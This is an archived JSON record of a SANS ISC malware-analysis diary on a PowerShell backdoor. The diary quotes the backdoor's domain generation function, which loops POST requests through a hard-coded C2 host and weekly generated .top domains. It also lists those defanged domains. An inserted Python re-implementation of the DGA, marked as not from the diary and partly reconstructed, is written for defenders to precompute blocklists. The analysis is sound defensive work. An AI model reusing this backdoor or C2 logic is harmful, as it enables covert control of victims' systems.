{
	"id": "bdeed0e8-fcda-4cd3-b80f-ca7624cfc84d",
	"created_at": "2026-04-06T00:22:33.153169Z",
	"updated_at": "2026-04-10T13:11:35.712664Z",
	"deleted_at": null,
	"sha1_hash": "63fe1710305b852170a52788272667e72a8e3834",
	"title": "Powershell Backdoor with DGA Capability - SANS ISC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 44038,
	"plain_text": "Powershell Backdoor with DGA Capability - SANS ISC\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 20:55:26 UTC\r\nA DGA (\"Domain Generation Algorithm\") is a popular technique used by malware to make C2 connections stealthier and harder to block. The idea is to derive domain names periodically (from the current date, for example) and use them during the defined period. A variant is to generate many candidate domains and loop through them until one resolves to a live C2 server. Attackers only need to register a few of the generated names and can move to new ones very quickly, while defenders cannot block the names in advance without knowing the algorithm.\r\nI found a simple malicious PowerShell script that implements a backdoor. The initial script (SHA256: 74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba)[1] had a VT score of only 2/60. It contains the second stage, Base64-encoded. Once the second stage has registered with the C2 server, it enters a loop and waits for commands from the C2.\r\nHere is how the DGA is implemented (URLs defanged; the Base64 expression on the third line is cut off in the captured copy):\r\nfunction zdiffvahs( $yyfhghws ){\r\n # The first candidate is hard-coded; the others are derived from the seeds below\r\n $jwusghd = \"hxxp://kama[.]mialeeka[.]com/\";\r\n \"hee\",\"xu1\",\"hs0\",\"jd5\",\"mqf\" | %{ $jwusghd += \",\"+\"hxxp://\"+ ( [Convert]::ToBase64String( [System\r\n # Try each candidate in turn until one answers the POST\r\n $jwusghd.split(\",\") | %{\r\n if( !$myurlpost ){\r\n $myurlpost = $_;\r\n if( !(sendpost2 ($yyfhghws + \"\u0026domen=$myurlpost\" )) ){ $myurlpost = $false; };\r\n Start-Sleep -s 5;\r\n }\r\n };\r\n # Registration only needs an acknowledgement; any other request returns the live C2 URL\r\n if( $yyfhghws -match \"status=register\" ){\r\n return \"ok\";\r\n }else{\r\n return $myurlpost;\r\n }\r\n};\r\nThe first C2 address is hard-coded in clear text (kama[.]mialeeka[.]com); five more are generated from the seeds \"hee\", \"xu1\", \"hs0\", \"jd5\" and \"mqf\" and appended to a comma-separated list. The list is then split and each candidate is contacted in turn through sendpost2(), with a five-second pause after each failed attempt, until one answers. A registration request (status=register) returns \"ok\"; any other request returns the URL of the first responsive C2. 
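As an added example (not code from the diary or from the malware), here is the same DGA re-implemented in Python so that a defender can precompute the candidate domains for a window of dates, for a DNS blocklist or sinkhole, and check a domain observed in DNS logs against them. The seeds, the '%y%m%V' date tag and the '.top' TLD come from the script above; the Base64 expression is cut off in the captured copy, so the encoding step (Base64 of seed + date tag, lowercased) is a reconstruction, chosen because it reproduces the five domains the diary lists for week 41 of October 2022. The helper names and the sample dates are illustrative.

```python
import base64
from datetime import date, timedelta

# Seeds and TLD taken from the PowerShell function quoted above.
SEEDS = ('hee', 'xu1', 'hs0', 'jd5', 'mqf')
TLD = '.top'


def _as_date(d):
    # Accept either a date object or an ISO string such as '2022-10-12'.
    return d if isinstance(d, date) else date.fromisoformat(d)


def date_tag(day):
    # Equivalent of the %y%m%V pattern: two-digit calendar year, calendar
    # month and ISO 8601 week number. %y and %m follow the calendar while
    # %V follows the ISO week, so the tag can change mid-week at a month or
    # year boundary.
    day = _as_date(day)
    return '%02d%02d%02d' % (day.year % 100, day.month, day.isocalendar()[1])


def dga_label(seed, day):
    # Reconstructed label (assumption): Base64(seed + tag), lowercased. Nine
    # input bytes give twelve Base64 characters with no padding, matching the
    # twelve-character labels in the diary's output.
    raw = (seed + date_tag(day)).encode('ascii')
    return base64.b64encode(raw).decode('ascii').lower()


def dga_domains(day):
    # The five generated candidates for one day. The hard-coded
    # kama[.]mialeeka[.]com is static and is not part of the algorithm.
    return [dga_label(seed, day) + TLD for seed in SEEDS]


def precompute(start, days):
    # Candidate domains for a window of days, deduplicated but kept in
    # generation order so the list is stable for diffing against a previous
    # run. Iterating per day rather than per ISO week catches the mid-week
    # tag changes described in date_tag().
    start = _as_date(start)
    out = []
    for i in range(days):
        for dom in dga_domains(start + timedelta(days=i)):
            if dom not in out:
                out.append(dom)
    return out


def match_observed(domain, start, days):
    # Triage helper for DNS logs: return (seed, ISO date) of the first day
    # in the window on which the DGA would produce this domain, else None.
    # Comparison is case-insensitive and ignores a trailing dot.
    start = _as_date(start)
    wanted = domain.lower().rstrip('.')
    for i in range(days):
        day = start + timedelta(days=i)
        for seed in SEEDS:
            if dga_label(seed, day) + TLD == wanted:
                return seed, day.isoformat()
    return None


if __name__ == '__main__':
    # Two weeks of candidates starting Monday 2022-10-10 (ISO week 41).
    for dom in precompute('2022-10-10', 14):
        print(dom)
```

Running the block prints two weeks of candidates starting on 2022-10-10. Precomputing per day rather than per week matters: because %y and %m follow the calendar while %V follows the ISO week, the tag, and with it the whole domain set, changes in the middle of any ISO week that straddles a month or year boundary, and a weekly precompute would miss those names.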
I made a clean version of this function (the Base64 expression is again cut off in the captured copy):\r\nfunction dgagen(){\r\n $domain = \"hxxp://kama[.]mialeeka[.]com/\";\r\n \"hee\",\"xu1\",\"hs0\",\"jd5\",\"mqf\" | %{ $domain += \",\"+\"hxxp://\"+ ( [Convert]::ToBase64String( [System.T\r\n $domain.split(\",\") | %{\r\n echo $_;\r\n };\r\n};\r\nThe generated list is:\r\nPS C:\\Users\\xavier\u003e dgagen\r\nhxxp://kama[.]mialeeka[.]com/\r\nhxxp://agvlmjixmdqx.top/\r\nhxxp://ehuxmjixmdqx.top/\r\nhxxp://ahmwmjixmdqx.top/\r\nhxxp://amq1mjixmdqx.top/\r\nhxxp://bxfmmjixmdqx.top/\r\nEach domain is built by concatenating a short seed string with the current date: the format \"%y%m%V\" yields the two-digit year, the month and the ISO week number, so the set changes every week (and also mid-week whenever a month boundary falls inside an ISO week). The result is Base64-encoded and lowercased, and the common TLD \".top\" is appended. As a check, the Base64 of hee221041 (seed \"hee\", week 41 of October 2022) is aGVlMjIxMDQx, which lowercased gives the first generated label above. The backdoor contacts the candidates in a loop until a live server is found.\r\nAt the time of writing, the initial domain points to Google Cloud. I checked the other domains against whois.nic.top, but they are not registered yet.\r\n[1] https://www.virustotal.com/gui/file/74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba\r\nXavier Mertens (@xme)\r\nXameco\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nSource: https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122"
	],
	"report_names": [
		"29122"
	],
	"threat_actors": [],
	"ts_created_at": 1775434953,
	"ts_updated_at": 1775826695,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63fe1710305b852170a52788272667e72a8e3834.pdf",
		"text": "https://archive.orkl.eu/63fe1710305b852170a52788272667e72a8e3834.txt",
		"img": "https://archive.orkl.eu/63fe1710305b852170a52788272667e72a8e3834.jpg"
	}
}